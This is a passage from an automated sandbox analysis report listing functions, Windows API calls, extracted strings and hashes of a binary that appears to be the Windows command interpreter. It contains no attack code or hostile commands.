                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset
                                              • String ID:
                                              • API String ID: 2221118986-0
                                              • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                              • Instruction ID: 1bc13282e995fa1d41f40da5b7b34278aaf352207f34ef7ac2cc64d36ada8f4d
                                              • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                              • Instruction Fuzzy Hash: 4FF0E922B0978140EA508757B5402A95290AF8CBF4F088330EF7D87BE5DE3CD451C705

                                              Non-executed Functions

                                              Function 00007FF6EB175B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                              • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                              • API String ID: 1388555566-2647954630
                                              • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                              • Instruction ID: 6d10ca6a76f209e6c72ca180990dab1fe544812c3823253c06d13e57dad321da
                                              • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                              • Instruction Fuzzy Hash: 9FA28333A0878286E7148B65E5543F967A1FB8EBA8F448135DA0E877E4DF3EE504C706
                                              Function 00007FF6EB17E680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                              • String ID: &<|>$+: $:$:EOF$=,;$^
                                              • API String ID: 511550188-726566285
                                              • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                              • Instruction ID: df9122f05cd58c70a0934b13ddc72fef35469d079bb4b8f1757df16726814d61
                                              • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                              • Instruction Fuzzy Hash: 5C52B223A0C66286EB248B14E4003F96AE5FB4E768F544135D94EC37F4DF7EE9458B0A
                                              Function 00007FF6EB179E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmp$wcschr$wcstol
                                              • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                              • API String ID: 1738779099-3004636944
                                              • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                              • Instruction ID: 94025db3cbd84410d014563e3ff8c08a9882085871ba4c610749293676bc408f
                                              • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                              • Instruction Fuzzy Hash: 54729F23B1866286EB108F65D4503FD37A1FB4976CF448035DE0D977E8DE7EA805878A
                                              Function 00007FF6EB197F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB197F44
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB197F5C
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB197F9E
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB197FFF
                                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198020
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198036
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198061
                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198075
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1980D6
                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1980EA
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB198177
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB19819A
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB1981BD
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB1981DC
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB1981FB
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB19821A
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB198239
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198291
                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1982D7
                                              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1982FB
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB19831A
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198364
                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198378
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB19839A
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1983AE
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1983E6
                                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198403
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198418
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                              • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                              • API String ID: 3637805771-3100821235
                                              • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                              • Instruction ID: e61dc3e9ab0ad267ac6f3d4aa82daa97b093b21698b37997f7e9417b4085e2b3
                                              • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                              • Instruction Fuzzy Hash: A9E18333A086928AE7109F65E4003F9BAB1FB4DBA8B448131CD1E937B4DF3EA508C705
                                              Function 00007FF6EB173F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                              • String ID: %s$%s
                                              • API String ID: 3623545644-3518022669
                                              • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                              • Instruction ID: 1953e87aef4ff74749297049025d82680142fe1ac7181fef4a05e22a5f8750c6
                                              • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                              • Instruction Fuzzy Hash: D5D29133A086828AEB649B25E8503F977A1FB4976CF104135DA0E87BB4DF7EE544C706
                                              Function 00007FF6EB172C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                              • String ID: %9d$%s
                                              • API String ID: 4286035211-3662383364
                                              • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                              • Instruction ID: 1d15df2cfa75a1f68113e848779b5be9e62925fce454f2ae67282f4e469a242e
                                              • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                              • Instruction Fuzzy Hash: 9752A333A08B828AEB648B24E9543F977A1FB8DB6CF404135DA0E877A4DF3DE5458705
                                              Function 00007FF6EB1818D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcsrchr$towlower
                                              • String ID: fdpnxsatz
                                              • API String ID: 3267374428-1106894203
                                              • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                              • Instruction ID: 4a11c160f18a57e273e190087919c0d439caa29e109cd33c0250bb4f2264c592
                                              • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                              • Instruction Fuzzy Hash: 4942BE23B08B8285EB648B2595403F967A1FF4DBA8F448135DE0E977E8DF3EE8558305
                                              Function 00007FF6EB177650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                              • String ID: DPATH
                                              • API String ID: 95024817-2010427443
                                              • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                              • Instruction ID: 3f93f368f9c54f789720bd6332309144ef911d0a94b0e69b2c6b5614e433e74a
                                              • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                              • Instruction Fuzzy Hash: 2D12A133A186C286E7649F15A4403F9B6A1FB8DB68F444135EA5E937B8DF3EE404CB05
                                              Function 00007FF6EB175240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [...]$ [..]$ [.]$...$:
                                              • API String ID: 0-1980097535
                                              • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                              • Instruction ID: 3672d3a0290ba93ee699136b5c74a0e89cc2463bf7cdf82d2b1e2238814c906a
                                              • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                              • Instruction Fuzzy Hash: 49329F73A0878286EB20DF65E5403F973A0EB4A7ACF404135DA0D876A5DF3DE549C74A
                                              Function 00007FF6EB176EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
                                              • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                              • API String ID: 4111365348-3662956551
                                              • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                              • Instruction ID: 686c20a036e981674a65bd778e9be8862310830616596b24a41d0e2063c14af3
                                              • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                              • Instruction Fuzzy Hash: 32E1B023E0869286EB608B65E8503F966A1FF4D7ACF444131DA0ED76B4DF3EE504C74A
                                              Function 00007FF6EB19EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcsupr.MSVCRT ref: 00007FF6EB19EF33
                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19EF98
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19EFA9
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19EFBF
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6EB19EFDC
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19EFED
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F003
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F022
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F083
                                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F092
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F0A5
                                              • towupper.MSVCRT ref: 00007FF6EB19F0DB
                                              • wcschr.MSVCRT ref: 00007FF6EB19F135
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F16C
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F185
                                                • Part of subcall function 00007FF6EB1801B8: _get_osfhandle.MSVCRT ref: 00007FF6EB1801C4
                                                • Part of subcall function 00007FF6EB1801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB1801D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                              • String ID: <noalias>$CMD.EXE
                                              • API String ID: 1161012917-1690691951
                                              • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                              • Instruction ID: 7c1954f321e39cdfc1a648c1f868064125b195cd4fa45f871415bb3756da6a57
                                              • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                              • Instruction Fuzzy Hash: 48918423B0969296FB149B60E4103FD6AA1BF4DB7CF488135DD0E926E5DF3EE4498306
                                              Function 00007FF6EB1732B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
